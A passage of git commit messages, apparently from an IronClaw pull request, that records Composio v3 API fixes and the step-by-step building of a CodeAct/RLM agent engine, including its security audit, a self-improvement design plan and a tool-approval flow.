Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
* fix: simplify entity_id fallback, add params type to schema
- Remove requester_id fallback from extract_entity_id (user_id is
always present in JobContext, so requester_id was dead code)
- Add "type": "object" to params field in both tool schema and
capabilities.json to prevent schema-driven callers from sending
non-object values
Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
* fix: align with Composio v3 API contract + fixture tests
Address serrrfirat's review — update all response parsing and request
fields to match the current Composio v3 API:
- Add unwrap_items() helper for paginated { "items": [...] } envelopes,
with bare-array fallback for backward compatibility
- connect_app: parse auth_configs from paginated response via
extract_auth_config_id()
- execute_action: use v3 fields `user_id` + `arguments` (not deprecated
`entity_id` + `input`)
- list_accounts/resolve_account: use plural query params `user_ids`,
`toolkit_slugs` (v3 contract)
- lookup_app_for_tool: look for nested `toolkit.slug` (v3), falling
back to `toolkit_slug` and `appName`
- find_active_account: sort by `updated_at` (v3), falling back to
`updatedAt`
Add 15 fixture-style tests covering:
- Paginated envelope parsing (envelope, bare array, empty, non-array)
- Auth config extraction (paginated, bare, empty)
- Toolkit slug extraction (v3 nested, legacy flat, appName fallback,
case-insensitive, not-found)
- Active account selection (v3 timestamps, legacy timestamps, no active)
Total: 25 tests (5 URL, 5 entity_id, 15 v3 contract fixtures)
Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
* fix: address PR review — remove duplicate parameters, validate params, fix ordering
- Remove `parameters` section from capabilities JSON (duplicates SCHEMA const,
runtime ignores it, creates drift risk)
- Fix Cargo.toml exclude ordering: tools-src/composio before tools-src/github
- Validate `params` is a JSON object when provided, reject non-object values early
- Remove 429 from retry logic (WASM has no sleep/backoff, immediate retry wastes
rate-limit budget) — only retry on transient 5xx
- Add tests for params validation
Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
* fix: address maintainer review — retry convention, numeric IDs, slug validation
- Revert 429 retry to align with github/web-search tool convention (sub-second
sliding-window resets can make immediate retries worthwhile)
- Handle numeric entity_id/user_id in context JSON (as_u64/as_i64 fallback)
- Add validate_tool_slug() defense-in-depth against path traversal (same
pattern as github tool)
- Add tests for numeric entity IDs and slug validation (32 total)
Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
* fix: address 4 unresolved audit issues — pagination, direct lookup, array params
1. list_tools: expose cursor/limit params in schema, preserve next_cursor
and total in response for multi-page browsing, add toolkit_versions=latest
2. lookup_app_for_tool: use direct GET /tools/{slug} endpoint instead of
fuzzy search (avoids false negatives from search pagination/ranking),
add toolkit_versions=latest
3. connected_accounts queries: encode user_ids and toolkit_slugs as array
params (user_ids[], toolkit_slugs[]) per v3 API contract
4. toolkit_versions=latest added to both list and lookup endpoints
Adds 5 new tests (37 total): cursor/limit params, array query encoding,
direct tool response parsing (v3 nested, legacy, missing).
Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
---------
Co-authored-by: ilblackdragon@gmail.com <ilblackdragon@gmail.com>
Co-authored-by: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
Co-authored-by: firat.sertgoz <f@nuff.tech>
…stant (#1736) * v2 architecture phase 1 * feat(engine): Phase 2 — execution loop, capability system, thread runtime Add the core execution engine to ironclaw_engine crate: - CapabilityRegistry: register/get/list capabilities and actions - LeaseManager: async lease lifecycle (grant, check, consume, revoke, expire) - PolicyEngine: deterministic effect-level allow/deny/approve - ThreadTree: parent-child relationship tracking - ThreadSignal/ThreadOutcome: inter-thread messaging via mpsc - ThreadManager: spawn threads as tokio tasks, stop, inject messages, join - ExecutionLoop: core loop replacing run_agentic_loop() with signals, context building, LLM calls, action execution, and event recording - Structured executor (Tier 0): lease lookup → policy check → effect execution - Tool intent nudge detection - MemoryStore + RetrievalEngine stubs for Phase 4 - Full 8-phase architecture plan in docs/plans/ - CLAUDE.md spec for the engine crate 74 tests passing, zero clippy warnings. Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> * feat(engine): Phase 3 — Monty Python executor with RLM pattern Add CodeAct execution (Tier 1) using the Monty embedded Python interpreter, following the Recursive Language Model (RLM) pattern from arXiv:2512.24601. Key additions: - executor/scripting.rs: Monty integration with FunctionCall-based tool dispatch, catch_unwind panic safety, resource limits (30s, 64MB, 1M allocs) - LlmResponse::Code variant + ExecutionTier::Scripting - Context-as-variables (RLM 3.4): thread messages, goal, step_number, previous_results injected as Python variables — LLM context stays lean while code accesses data selectively - llm_query(prompt, context) (RLM 3.5): recursive subagent calls from within Python code — results stored as variables, not injected into parent's attention window (symbolic composition) - Compact output metadata between code steps instead of full stdout - MontyObject ↔ serde_json::Value bidirectional conversion - Updated architecture plan with RLM design principles 74 tests passing, zero clippy warnings. Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> * feat(engine): RLM best-practices enhancements from cross-reference analysis Cross-referenced our implementation against the official RLM (alexzhang13/rlm), fast-rlm (avbiswas/fast-rlm), and Prime Intellect's verifiers implementation. Key enhancements: - FINAL(answer) / FINAL_VAR(name): explicit termination pattern matching all three reference implementations. Code can signal completion at any point, not just via return value. - llm_query_batched(prompts): parallel recursive sub-calls via tokio::spawn, matching fast-rlm's asyncio.gather pattern and Prime Intellect's llm_batch. - Output truncation increased to 8000 chars (from 120), matching Prime Intellect's 8192 default. Shows [TRUNCATED: last N chars] or [FULL OUTPUT]. - Step 0 orientation preamble: auto-injects context metadata (message count, total chars, goal, last user message preview) before first code step, matching fast-rlm's auto-print pattern. - Error-to-LLM flow: Python parse errors, runtime errors, NameErrors, OS errors, and async errors now flow back as stdout content instead of terminating the step, enabling LLM self-correction on next iteration. Only VM panics (catch_unwind) terminate as EngineError. 74 tests passing, zero clippy warnings. Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> * docs(engine): update architecture plan with RLM cross-reference learnings Comprehensive update after cross-referencing against official RLM (alexzhang13/rlm), fast-rlm (avbiswas/fast-rlm), Prime Intellect (verifiers/RLMEnv), rlm-rs (zircote/rlm-rs), and Google ADK RLM. Changes: - Mark Phases 1-3 as DONE with commit refs and test counts - Add "Key Influences" section documenting all reference implementations - Phase 3: full table of implemented RLM features with sources - Phase 3: "Remaining gaps" table with which phase addresses each - Phase 4: expanded with compaction (85% context), rlm_query() (full recursive sub-agent), dual model routing, budget controls (USD, timeout, tokens, consecutive errors), lazy loading, pass-by-reference - Add "RLM Execution Model" cross-cutting section - Add "Implementation Progress" tracking table - Remove stale "TO IMPLEMENT" markers (all Phase 3 work is done) Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> * feat(engine): Phase 4 — budget controls, compaction, reflection pipeline Budget enforcement in ExecutionLoop: - max_tokens_total: cumulative token limit, checked before each iteration - max_duration: wall-clock timeout for entire thread - max_consecutive_errors: consecutive error steps threshold (resets on success, matching official RLM behavior) - All produce ThreadOutcome::Failed with descriptive messages Context compaction (from RLM paper, 85% threshold): - estimate_tokens(): char-based estimation (chars/4, matching RLM) - should_compact(): triggers when tokens >= threshold_pct * context_limit - compact_messages(): asks LLM to summarize progress, replaces history with [system, summary, continuation_note], preserves intermediate results - Configurable via ThreadConfig: model_context_limit, compaction_threshold Dual model routing: - LlmCallConfig gains depth field (0=root, 1+=sub-call) - Implementations can route to cheaper models for sub-calls - ExecutionLoop passes thread depth to every LLM call Reflection pipeline (reflection/pipeline.rs): - reflect(thread, llm): analyzes completed thread via LLM - Produces Summary doc (always), Lesson doc (if errors), Issue doc (if failed) - Builds transcript from thread messages + error events - Returns ReflectionResult with docs + token usage ThreadConfig extended with: max_tokens_total, max_consecutive_errors, model_context_limit, enable_compaction, compaction_threshold, depth, max_depth. 78 tests passing, zero clippy warnings. Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> * feat(engine): Phase 5 — conversation surface separated from execution Conversation is now a UI layer, not an execution boundary. Multiple threads can run concurrently within one conversation; threads can outlive their originating conversation. New types (types/conversation.rs): - ConversationSurface: channel + user + entries + active_threads - ConversationEntry: sender (User/Agent/System) + content + origin_thread_id - ConversationId, EntryId (UUID newtypes) - EntrySender enum (User, Agent{thread_id}, System) ConversationManager (runtime/conversation.rs): - get_or_create_conversation(channel, user) — indexed by (channel, user) - handle_user_message() — injects into active foreground thread or spawns new - record_thread_outcome() — adds agent/system entries, untracks completed threads - get_conversation(), list_conversations() This enables the key architectural insight: a user can ask "what's the weather?" while a deployment thread is still running. Both produce entries in the same conversation. 85 tests passing, zero clippy warnings. Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> * docs(engine): simplify execution tiers — Monty-only for CodeAct/RLM Restructure phases 6-8 to clarify execution model: - Monty is the sole Python executor for CodeAct/RLM. No WASM or Docker Python runtimes for LLM-generated code. - WASM sandbox is for third-party tool isolation (existing infra, Phase 8) - Docker containers are for thread-level isolation of high-risk work (Phase 8) - Two-phase commit moves to Phase 6 (integration) at the adapter boundary Phase renumbering: - Old Phase 6 (Tier 2-3) → removed as separate phase - Old Phase 7 (integration) → Phase 6 - Old Phase 8 (cleanup) → Phase 7 - New Phase 8: WASM tools + Docker thread isolation (infra integration) Updated progress table: Phases 1-5 marked DONE with test counts and commits. Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> * feat(engine): Phase 6 — bridge adapters for main crate integration Strategy C parallel deployment: when ENGINE_V2=true env var is set, user messages route through the engine instead of the existing agentic loop. All existing behavior is unchanged when the flag is off. Bridge module (src/bridge/): - LlmBridgeAdapter: wraps LlmProvider as engine LlmBackend, converts ThreadMessage↔ChatMessage, ActionDef↔ToolDefinition, depth-based model routing (primary vs cheap_llm) - EffectBridgeAdapter: wraps ToolRegistry+SafetyLayer as EffectExecutor, routes tool calls through existing execute_tool_with_safety pipeline - InMemoryStore: HashMap-backed Store impl (no DB tables needed yet) - EngineRouter: is_engine_v2_enabled() + handle_with_engine() that builds engine from Agent deps and processes messages end-to-end Integration touchpoint (4 lines in agent_loop.rs): After hook processing, before session resolution, check ENGINE_V2 flag and route UserInput through the engine path. Accessor visibility widened: llm(), cheap_llm(), safety(), tools() changed from pub(super) to pub(crate) for bridge access. 85 engine tests + main crate clippy clean. Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> * fix(engine): add user message and system prompt to thread before execution The ExecutionLoop was sending empty messages to the LLM because the thread was spawned with the user's input as the goal but no messages. Fixes: - ThreadManager.spawn_thread() now adds the goal as an initial user message before starting the execution loop - ExecutionLoop.run() injects a default system prompt if none exists Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> * fix(bridge): match existing LLM request format to prevent 400 errors The LLM bridge was missing several defaults that the existing Reasoning.respond_with_tools() sets: - tool_choice: "auto" when tools are present (required by some providers) - max_tokens: 4096 (default) - temperature: 0.7 (default) - When no tools (force_text): use plain complete() instead of complete_with_tools() with empty tools array — matches existing no-tools fallback path Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> * fix(engine): persist conversation context across messages The engine was creating a fresh ThreadManager and InMemoryStore per message, losing all context between turns. A follow-up question like "what are the latest 10 issues?" had no memory of the prior "how many issues" response. Fixes: - EngineState (ThreadManager, ConversationManager, InMemoryStore) now persists across messages via OnceLock, initialized on first use - ConversationManager builds message history from prior conversation entries (user messages + agent responses) and passes it to new threads - ThreadManager.spawn_thread_with_history() accepts initial_messages that are prepended before the current user message - System notifications (thread started/completed) are filtered out of the history (not useful as LLM context) Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> * feat(engine): enable CodeAct/RLM mode with code block detection The engine now operates in CodeAct/RLM mode: System prompt (executor/prompt.rs): - Instructs LLM to write Python in ```repl fenced blocks - Documents available tools as callable Python functions - Documents llm_query(), llm_query_batched(), FINAL() - Documents context variables (context, goal, step_number, previous_results) - Strategy guidance: examine context, break into steps, use tools, call FINAL() Code block detection (bridge/llm_adapter.rs): - extract_code_block() scans LLM text responses for ```repl or ```python blocks - When detected, returns LlmResponse::Code instead of LlmResponse::Text - The ExecutionLoop routes Code responses through Monty for execution No structured tool definitions sent to LLM: - Tools are described in the system prompt as Python functions - The LLM call sends empty actions array, forcing text-mode responses - This ensures the LLM writes code blocks (CodeAct) instead of structured tool calls (which would bypass the REPL) 85 tests passing, zero clippy warnings. Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> * test(engine): add 8 CodeAct/RLM E2E tests with mock LLM Comprehensive test coverage for the Monty Python execution path: - codeact_simple_final: Python code calls FINAL('answer') → thread completes - codeact_tool_call_then_final: code calls test_tool() → FunctionCall suspends VM → MockEffects returns result → code resumes → FINAL() - codeact_pure_python_computation: sum([1,2,3,4,5]) → FINAL('Sum is 15') with no tool calls — pure Python in Monty - codeact_multi_step: first step prints output (no FINAL), second step sees output metadata and calls FINAL — tests iterative REPL flow - codeact_error_recovery: first step has NameError → error flows to LLM as stdout → second step recovers with FINAL — tests error transparency - codeact_context_variables_available: code accesses `goal` and `context` variables injected by the RLM context builder - codeact_multiple_tool_calls_in_loop: for loop calls test_tool() 3 times → 3 FunctionCall suspensions → all results collected → FINAL - codeact_llm_query_recursive: code calls llm_query('prompt') → VM suspends → MockLlm provides sub-agent response → result returned as Python string variable 93 tests passing (85 prior + 8 new), zero clippy warnings. Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> * fix(bridge): detect code blocks in plain completion path + multi-block support Two bugs fixed: 1. The no-tools completion path (used by CodeAct since we send empty actions) returned LlmResponse::Text without checking for code blocks. Code blocks were rendered as markdown text instead of being executed. 2. extract_code_block now: - Handles bare ``` fences (skips non-Python languages) - Collects ALL code blocks in the response and concatenates them (models often split code across multiple blocks with explanation) - Tries markers in order: ```repl, ```python, ```py, then bare ``` Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> * test(bridge): add 11 regression tests for code block extraction Covers the exact failure modes discovered during live testing: - extract_repl_block: standard ```repl fenced block - extract_python_block: ```python marker - extract_py_block: ```py shorthand - extract_bare_backtick_block: bare ``` with Python content - skip_non_python_language: ```json should NOT be extracted - no_code_blocks_returns_none: plain text, no fences - multiple_code_blocks_concatenated: two ```repl blocks with explanation between them → concatenated with \n\n - mixed_thinking_and_code: model outputs explanation + two ```python blocks (the Hyperliquid case) → both extracted - repl_preferred_over_bare: ```repl takes priority over bare ``` - empty_code_block_skipped: empty fenced block returns None - unclosed_block_returns_none: no closing ``` returns None Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> * fix(engine): detect FINAL() in text responses + regression tests Models sometimes write FINAL() outside code blocks — as plain text after an explanation. The Hyperliquid case: model outputs a long analysis then FINAL("""...""") at the end, not inside ```repl fences. Fixes: - extract_final_from_text(): regex-based FINAL detection in text responses, matching the official RLM's find_final_answer() fallback - Handles: double-quoted, single-quoted, triple-quoted, unquoted, nested parens - Checked in LlmResponse::Text handler BEFORE tool intent nudge (FINAL takes priority) 9 new tests: - codeact_final_in_text_response: FINAL("answer") in plain text - codeact_final_triple_quoted_in_text: FINAL("""multi\nline""") in text - final_double_quoted, final_single_quoted, final_triple_quoted, final_unquoted, final_with_nested_parens, final_after_long_text, no_final_returns_none 102 tests passing (93 + 9 new), zero clippy warnings. Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> * docs: add crate extraction & cleanup roadmap Documents architectural recommendations from the engine v2 design process for future reference: - Root directory consolidation (channels-src + tools-src → extensions/) - Crate extraction tiers: zero-coupling (estimation, observability, tunnel), trivial-coupling (document_extraction, pairing, hooks), medium-coupling (secrets, MCP, db, workspace, llm, skills), heavy-coupling (web gateway, agent, extensions) - src/ module reorganization into logical groups (core, persistence, infra, media, support) - main.rs/app.rs slimming targets (100/500 lines after migration) - WASM module candidates (document_extraction) and non-candidates (REPL, web gateway → separate crates instead) - Priority ordering for extraction work - Tracks completed items (ironclaw_safety, ironclaw_engine, transcription move) Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> * feat(engine): live progress status updates via event broadcast Engine v2 now shows live progress in the CLI (and any channel): - "Thinking..." when a step starts - Tool name + success/error when actions execute - "Processing results..." when a step completes Implementation: - ThreadManager holds a broadcast::Sender<ThreadEvent> (capacity 256) - ExecutionLoop.emit_event() writes to thread.events AND broadcasts - ThreadManager.subscribe_events() returns a receiver - Router uses tokio::select! to listen for events while waiting for thread completion, forwarding them as StatusUpdate to the channel This replaces the polling approach with zero-latency event streaming. Agent.channels visibility widened to pub(crate) for bridge access. 102 tests passing, zero clippy warnings. Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> * fix(engine): include tool results in code step output for LLM context The LLM was ignoring tool results and answering from training data because the compact output metadata didn't include what tools returned. Tool results lived only as ActionResult messages (role: Tool) which some providers flatten or the model ignores. Now the code step output includes: - stdout from Python print() statements - [tool_name result] with the actual output (truncated to 4K per tool) - [tool_name error] for failed tools - [return] for the code's return value - Total output truncated to 8K chars to prevent context bloat This ensures the model sees web_search results, API responses, etc. in the next iteration and can reason about them instead of hallucinating. Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> * feat(engine): add debug/trace logging for CodeAct execution Three verbosity levels for debugging the engine: RUST_LOG=ironclaw_engine=debug: - LLM call: message count, iteration, force_text - LLM response: type (text/code/action_calls), token usage - Code execution: code length, action count, had_error, final_answer - Text response: length, FINAL() detection RUST_LOG=ironclaw_engine=trace: - Full message list sent to LLM (role, length, first 200 chars each) - Full code block being executed - stdout preview (first 500 chars) - Per-tool results (name, success, first 300 chars of output) - Text response preview (first 500 chars) Usage: ENGINE_V2=true RUST_LOG=ironclaw_engine=debug cargo run ENGINE_V2=true RUST_LOG=ironclaw_engine=trace cargo run Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> * feat(engine): execution trace recording + retrospective analysis Enable with ENGINE_V2_TRACE=1 to get full execution traces and automatic issue detection after each thread completes. Trace recording (executor/trace.rs): - build_trace(): captures full thread state — messages (with full content), events, step count, token usage, detected issues - write_trace(): writes JSON to engine_trace_{timestamp}.json - log_trace_summary(): logs summary + issues at info/warn level Retrospective analyzer detects 8 issue categories: - thread_failure: thread ended in Failed state - no_response: no assistant message generated - tool_error: specific tool failures with error details - code_error: Python errors (NameError, SyntaxError, etc.) in output - missing_tool_output: tool results exist but not in system messages - excessive_steps: >10 steps (may be stuck in loop) - no_tools_used: single-step answer without tools (hallucination risk) - mixed_mode: text responses without code blocks (prompt not followed) Thread state now saved to store after execution completes (for trace access after join_thread). Usage: ENGINE_V2=true ENGINE_V2_TRACE=1 cargo run # After each message: trace JSON + issue log in terminal Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> * feat(engine): wire reflection pipeline + trace analysis into thread lifecycle After every thread completes, ThreadManager now automatically runs: 1. Retrospective trace analysis (non-LLM, always): - Detects 8 issue categories (tool errors, code errors, missing outputs, excessive steps, hallucination risk, etc.) - Logs issues at warn level when found 2. Trace file recording (when ENGINE_V2_TRACE=1): - Writes full JSON trace to engine_trace_{timestamp}.json 3. LLM reflection (when enable_reflection=true): - Calls reflection pipeline to produce Summary, Lesson, Issue docs - Saves docs to store for future context retrieval - Enabled by default in the bridge router All three run inside the spawned tokio task after exec.run() completes, before saving the final thread state. No external wiring needed. Removed duplicate trace recording from the router — it's now handled by ThreadManager automatically. Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> * fix(bridge): convert tool name hyphens to underscores for Python compatibility Root cause from trace analysis: the LLM writes `web_search()` (valid Python identifier) but the tool registry has `web-search` (with hyphen). The EffectBridgeAdapter couldn't find the tool → "Tool not found" error → model fabricated fake data instead. Fixes: - available_actions(): converts tool names from hyphens to underscores (web-search → web_search) so the system prompt lists valid Python names - execute_action(): tries the original name first, then falls back to hyphenated form (web_search → web-search) for tool registry lookup - Same conversion in router's capability registry builder Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> * fix(bridge): parse JSON tool output to prevent double-serialization From trace analysis: web_search returned a JSON string, which was wrapped as serde_json::json!(string) creating a Value::String containing JSON. When Monty got this as MontyObject::String, the Python code couldn't index it with result['title'] → TypeError. Fix: try parsing the tool output string as JSON first. If valid, use the parsed Value (becomes a Python dict/list). If not valid JSON, keep as string. This means web_search results are directly indexable in Python: results = web_search(query="...") print(results["results"][0]["title"]) # works now Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> * feat(engine): persist variables across code steps via `state` dict Monty creates a fresh runtime per code step, so variables are lost between steps. This caused the model to re-paste tool results from system messages, wasting tokens. Fix: maintain a `persisted_state` JSON dict in the ExecutionLoop that accumulates across steps: - Tool results stored by tool name: state["web_search"] = {results...} - Return values stored: state["last_return"], state["step_0_return"] - Injected as a `state` Python variable in each new MontyRun Now the model can do: Step 1: results = web_search(query="...") # tool result saved in state Step 2: data = state["web_search"] # access previous result summary = llm_query("summarize", str(data)) FINAL(summary) System prompt updated to document the `state` variable. Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> * fix(engine): add state hint on code errors + retrieval engine integration When code fails with NameError/UnboundLocalError (model trying to access variables from a previous step), the error output now includes: [HINT] Variables don't persist between code blocks. Use the `state` dict to access data from previous steps. Available keys: ["web_search", "last_return"] This teaches the model to use `state["web_search"]` instead of `result` after a NameError, reducing wasted steps from 3-4 to 1. Also integrates RetrievalEngine into context building and ThreadManager: - build_step_context() now accepts optional RetrievalEngine to inject relevant memory docs (Lessons, Specs, Playbooks) into LLM context - RetrievalEngine uses keyword matching with doc-type priority scoring - Memory docs from reflection (Phase 4) now feed back into future threads Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> * chore: remove trace files and add to .gitignore Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> * fix(engine): replace web_fetch example with web_search in CodeAct prompt The system prompt example used web_fetch(url="...") which doesn't exist as a tool. The model learned from the example and tried web_fetch, getting "Tool not found". Changed to web_search(query="...") which is an actual registered tool. Found via trace analysis — reflection pipeline correctly identified this as a "Tool Name Correction" spec doc. Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> * refactor(engine): extract prompt templates to markdown files Prompt templates moved from inline Rust strings to plain markdown files at crates/ironclaw_engine/prompts/ for easy inspection and iteration: - prompts/codeact_preamble.md — main instructions, special functions, context variables, rules - prompts/codeact_postamble.md — strategy section Loaded at compile time via include_str!(), so no runtime file I/O. Edit the .md files and rebuild to iterate on prompts. Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> * fix(engine): replace byte-index slicing with char-safe truncation Panic: 'byte index 80 is not a char boundary; it is inside ''' when tool output contained multi-byte UTF-8 characters (smart quotes from web search results). Fixed 4 unsafe byte-index slices: - thread.rs:281: message preview &content[..80] → chars().take(80) - loop_engine.rs:556: tool output &str[..4000] → chars().take(4000) - loop_engine.rs:579: output tail &str[len-8000..] → chars().skip() - scripting.rs:82: stdout tail &str[len-N..] → chars().skip() All now use .chars().take() or .chars().skip() which respect character boundaries. Follows CLAUDE.md rule: "Never use byte-index slicing on user-supplied or external strings." Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> * fix(engine): fix false positive missing_tool_output warning in trace analyzer The check was looking for "[" + "result]" in System-role messages only, but tool output metadata is added with patterns like "[shell result]" and may appear in messages with any role. Changed to scan all messages for " result]" or " error]" patterns regardless of role. Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> * docs(engine): update architecture plan with Phase 6 status and approval flow design Phase 6 updated to reflect what was actually built: - Bridge adapters (LLM, Effect, InMemoryStore, Router) — all done - Integration touchpoint (4 lines in handle_message) — done - Live progress via broadcast events — done - Conversation persistence across messages — done - Trace recording + retrospective analysis — done - 8 bugs found and fixed via trace analysis — documented Phase 6 remaining work documented: - Approval flow: detailed 5-step design (send to channel, pause thread, route response, resume execution, always handling) with v1 reference - Database persistence (InMemoryStore → real DB tables) - Acceptance testing (TestRig + TraceLlm fixtures) - Two-phase commit for high-stakes effects Progress table updated: Phase 6 marked as DONE (partial), 134 tests. Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> * docs: add self-improving engine design plan Designs a system where the engine debugs and improves itself, based on the pattern observed in the last session: 5 consecutive bug fixes all followed trace → read → identify → edit → test, using tools the engine already has access to. Three levels of self-improvement: - Level 1 (Prompt): edit prompts/*.md to prevent LLM mistakes. Auto-apply. - Level 2 (Config): adjust defaults/mappings. Branch + test + PR. - Level 3 (Code): Rust patches for engine bugs. Branch + test + clippy + PR. Architecture: Self-improvement Mission spawns a Reflection thread that reads traces, reads source, proposes fixes, validates via cargo test, and either auto-applies (Level 1) or creates a PR (Level 2-3). Includes: fix pattern database (seeded from our 8 debugging session fixes), feedback loop diagram, safety model, implementation phases (A through D), and what exists vs what's new. Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> * docs: add engine v2 security model and audit Comprehensive security analysis of engine v2 covering: Threat model: 4 attacker profiles (malicious input, prompt injection via tools, poisoned memory, supply chain). Current state audit: 9 controls working (Monty sandbox, safety layer, policy engine, leases, provenance, events) and 9 gaps identified. Critical finding: ALL tools granted by default — CodeAct code can call shell, write_file, apply_patch without approval. Proposed fix: 3-tier tool classification (auto/approve-once/always-approve). CodeAct-specific threats: tool call amplification, prompt injection via search results, data exfiltration via tool chains, Monty escape. Self-improvement security: poisoned trace attacks, memory poisoning via reflection. Mitigations: edit validation, frequency caps, audit trail, auto-rollback, reflection output scanning. 6-layer security architecture proposed: input validation, capability gating, output sanitization, execution sandboxing, self-improvement controls, observability. Prioritized implementation plan with severity/effort ratings. Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> * docs(security): cross-reference v1 controls — use, don't reinvent Updated security plan with detailed audit of ALL existing v1 security controls and how they map to engine v2 bridge gaps: Key finding: v1 already has solutions for every security gap identified. The bridge just needs to wire them in: - Tool::requires_approval() exists but bridge doesn't call it - safety.wrap_for_llm() exists but tool results enter context unwrapped - RateLimiter exists but bridge doesn't check rate limits - BeforeToolCall hooks exist but bridge doesn't run them - redact_params() exists but bridge doesn't redact sensitive params - Shell risk classification (Low/Medium/High) is inherited but ignored Revised priority: most fixes are small wiring tasks in EffectBridgeAdapter, not new security infrastructure. The bridge is the security boundary. Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> * feat(engine): add missions, reliability tracker, reflection executor, and provenance-aware policy - Add Mission type and MissionManager for recurring thread scheduling - Add ReliabilityTracker for per-capability success/failure/latency tracking - Add reflection executor that spawns CodeAct threads for post-completion reflection - Extend PolicyEngine with provenance-aware taint checking (LLM-generated data requires approval for financial/external-write effects) - Extend Store trait with mission CRUD methods - Add conversation surface tracking, compaction token fix, context memory injection - Wire new modules through lib.rs re-exports and bridge adapters Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> * feat(bridge): wire v1 security controls into engine v2 adapter Zero engine crate changes. All security controls enforced at the bridge boundary in EffectBridgeAdapter: 1. Tool approval (v1: Tool::requires_approval): - Checks each tool's approval requirement with actual params - Always → returns EngineError::LeaseDenied (blocks execution) - UnlessAutoApproved → checks auto_approved set, blocks if not approved - Never → proceeds - Per-session auto_approved HashSet (for future "always" handling) 2. Hook interception (v1: BeforeToolCall): - Runs HookEvent::ToolCall before every execution - HookOutcome::Reject → blocks with reason - HookError::Rejected → blocks with reason - Hook errors → fail-open (logged, execution continues) 3. Output sanitization (v1: sanitize_tool_output + wrap_for_llm): - Leak detection: API keys in tool output are redacted - Policy enforcement: content policy rules applied - Length truncation: output capped at 100KB - XML boundary protection: prevents injection via tool output 4. Sensitive param redaction (v1: redact_params): - Tool's sensitive_params() consulted before hooks see parameters - Redacted params sent to hooks, original params used for execution 5. available_actions() now sets requires_approval based on each tool's default approval requirement, so the engine's PolicyEngine can gate tools it hasn't seen before. 6. Actual execution timing measured via Instant::now() (replaces placeholder Duration::from_millis(1)). Accessor visibility: hooks() widened to pub(crate). Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> * feat(bridge): implement tool approval flow for engine v2 Adds a complete approval flow that mirrors v1 behavior, using the existing v1 security controls (Tool::requires_approval, auto-approve sets, StatusUpdate::ApprovalNeeded). ## How it works ### Step 1: Tool blocked at execution When the LLM's code calls a tool (e.g., `shell("ls")`): 1. EffectBridgeAdapter.execute_action() looks up the Tool object 2. Calls tool.requires_approval(¶ms) — returns ApprovalRequirement 3. If Always → EngineError::LeaseDenied (always blocks) 4. If UnlessAutoApproved → checks auto_approved HashSet → if not in set, returns EngineError::LeaseDenied 5. If Never → proceeds to execution ### Step 2: Engine returns NeedApproval The LeaseDenied error propagates through: - CodeAct path: becomes Python RuntimeError, code halts, thread returns NeedApproval with action_name + parameters - Structured path: same via ActionResult.is_error ### Step 3: Router stores pending approval - PendingApproval { action_name, original_content } stored on EngineState - StatusUpdate::ApprovalNeeded sent to channel (shows approval card in CLI/web with tool name, parameters, yes/always/no buttons) - Returns text: "Tool 'shell' requires approval. Reply yes/always/no." ### Step 4: User responds handle_message() intercepts Submission::ApprovalResponse when ENGINE_V2: - 'yes' → auto_approve_tool(name) on EffectBridgeAdapter, re-processes original message (tool now passes the approval check on second run) - 'always' → same + logs for session persistence - 'no' → returns "Denied: tool was not executed." ### Key design choice Instead of pausing/resuming mid-execution (which needs engine changes to freeze/restore the Monty VM state), we auto-approve the tool and re-run the full message. The EffectBridgeAdapter's auto_approved set persists across runs, so the second execution passes immediately. This trades one extra LLM call for zero engine modifications. ## Files changed - src/bridge/router.rs: PendingApproval struct, handle_approval(), NeedApproval → StatusUpdate::ApprovalNeeded conversion - src/bridge/mod.rs: export handle_approval - src/agent/agent_loop.rs: intercept ApprovalResponse for engine v2 - src/bridge/effect_adapter.rs: fmt fixes 151 tests passing, clippy + 